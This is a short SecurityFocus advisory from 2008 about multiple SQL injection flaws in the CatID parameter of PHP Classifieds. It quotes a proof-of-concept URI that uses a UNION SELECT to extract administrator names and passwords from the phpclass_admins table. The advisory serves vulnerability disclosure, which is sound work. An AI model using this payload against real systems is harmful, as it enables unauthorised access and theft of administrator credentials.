Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

PHP Classifieds CatID Parameter Multiple SQL Injection Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URI has been provided:

http://www.example.com/index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins







 

Privacy Statement
Copyright 2008, SecurityFocus